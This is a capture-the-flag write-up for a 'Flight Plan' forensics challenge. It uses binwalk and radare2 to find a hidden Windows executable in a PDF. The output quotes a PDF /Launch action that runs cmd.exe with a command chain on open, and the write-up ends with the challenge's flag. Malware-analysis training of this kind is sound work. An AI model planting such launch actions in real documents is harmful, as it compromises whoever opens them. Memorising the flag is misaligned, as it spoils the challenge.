Flight Plan (Smart Airspace, 300p)
After everything is cleared you start to wonder about the origin of this attack.
When inspecting the logs, a correlation between the start of the compromise and a pdf file arriving to the ATC can be made.
Inspect the flight plan, find out if there is anything malicious hidden in it.
Flag format: uuid v4
solution
Running binwalk and extracting.
# binwalk -e flight-plan.pdf
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PDF document, version: "1.4"
318 0x13E Unix path: /PDF/ImageC/ImageI/ImageB/Text]/Font<</F0 8 0 R/TT0 9 0 R/TT1 10 0 R/TT2 11 0 R>>/ExtGState<</GS0 12 0 R>>/Properties<</MC0 13 0
683 0x2AB Zlib compressed data, default compression
5420 0x152C Zlib compressed data, default compression
6364 0x18DC Unix path: /Type/Font/Subtype/Type1/BaseFont/Courier-Bold/Encoding/WinAnsiEncoding>>
6552 0x1998 Unix path: /Subtype/TrueType/Type/Font/Widths[278 0 0 0 0 0 0 0 333 333 0 0 0 333 278 278 556 556 556 556 0 556 556 556 556 556 0 0 0 0 0 0
6990 0x1B4E Unix path: /Subtype/TrueType/Type/Font/Widths[278 0 0 0 0 0 0 0 333 333 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 722 0 722 722 667 611
7372 0x1CCC Unix path: /Subtype/TrueType/Type/Font/Widths[278 0 0 0 0 0 0 0 0 0 0 0 0 333 0 278 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 722 722 722 0 0 0 0 0
7694 0x1E0E Unix path: /SMask/None/Type/ExtGState/ca 1.0/op false>>
170078 0x2985E Unix path: /Encoding/Identity-H/Subtype/Type0/ToUnicode 50 0 R/Type/Font>>
170663 0x29AA7 Unix path: /www.w3.org/1999/02/22-rdf-syntax-ns#">
170873 0x29B79 Unix path: /purl.org/dc/elements/1.1/"
170932 0x29BB4 Unix path: /ns.adobe.com/xap/1.0/mm/">>
179687 0x2BDE7 Unix path: /Subtype/CIDFontType0/Type/Font/W[0 381 600]>>
183223 0x2CBB7 Unix path: /Subtype/CIDFontType0/Type/Font/W[0 381 600]>>
185410 0x2D442 Unix path: /SMask/None/Type/ExtGState/ca 1.0/op false>>
186066 0x2D6D2 Copyright string: "copyright/ordfeminine 172/logicalnot/.notdef/registered/macron/degree/plusminus/twosuperior/threesuperior/acute/mu 183/periodcen"
187942 0x2DE26 Zlib compressed data, best compression
232099 0x38AA3 Unix path: /S/Launch/Type/Action/Win<</F(cmd.exe)/D(c:\\windows\\system32)/P(/Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\\ATS flightSearching for flag, turns up Windows executable.
% strings _flight-plan.pdf.extracted/* | grep flag
hX ha394hcf15h8adehb84-h8c-ah2-42h-888h25f2h3a44h is hflag1
# grep -H flag _flight-plan.pdf.extracted/*
Binary file _flight-plan.pdf.extracted/2DE26 matches
ar@de02:~/ctf/cybershock22/smart-airspace.flight-plan.300pts % file _flight-plan.pdf.extracted/2DE26
_flight-plan.pdf.extracted/2DE26: PE32 executable (GUI) Intel 80386, for MS Windows
Investigating the executable further, leads to flag.
% r2 -A _flight-plan.pdf.extracted/2DE26
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for vtables
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
-- Use rabin2 to discover the real TRUTH
[0x00406621]> izz~flag
363 0x000084cd 0x004084cd 65 67 .text utf8 hX ha394hcf15h8adehb84-h8c-ah2-42h-888h25f2h3a44h is hflag1ɈL$, blocks=Basic Latin,Latin Extended-B
[0x00406621]> pd 16@0x004084cd
0x004084cd 6858202020 push 0x20202058 ; 'X '
0x004084d2 6861333934 push 0x34393361 ; 'a394'
0x004084d7 6863663135 push 0x35316663 ; 'cf15'
0x004084dc 6838616465 push 0x65646138 ; '8ade'
0x004084e1 686238342d push 0x2d343862 ; 'b84-'
0x004084e6 6838632d61 push 0x612d6338 ; '8c-a'
0x004084eb 68322d3432 push 0x32342d32 ; '2-42'
0x004084f0 682d383838 push 0x3838382d ; '-888'
0x004084f5 6832356632 push 0x32663532 ; '25f2'
0x004084fa 6833613434 push 0x34346133 ; '3a44'
0x004084ff 6820697320 push 0x20736920 ; ' is '
0x00408504 68666c6167 push 0x67616c66 ; 'flag'
0x00408509 31c9 xor ecx, ecx
0x0040850b 884c242c mov byte [esp + 0x2c], cl
0x0040850f 89e1 mov ecx, esp
0x00408511 31d2 xor edx, edxRead the flag from bottom to top.
Flag is 3a4425f2-8882-428c-ab84-8adecf15a394.
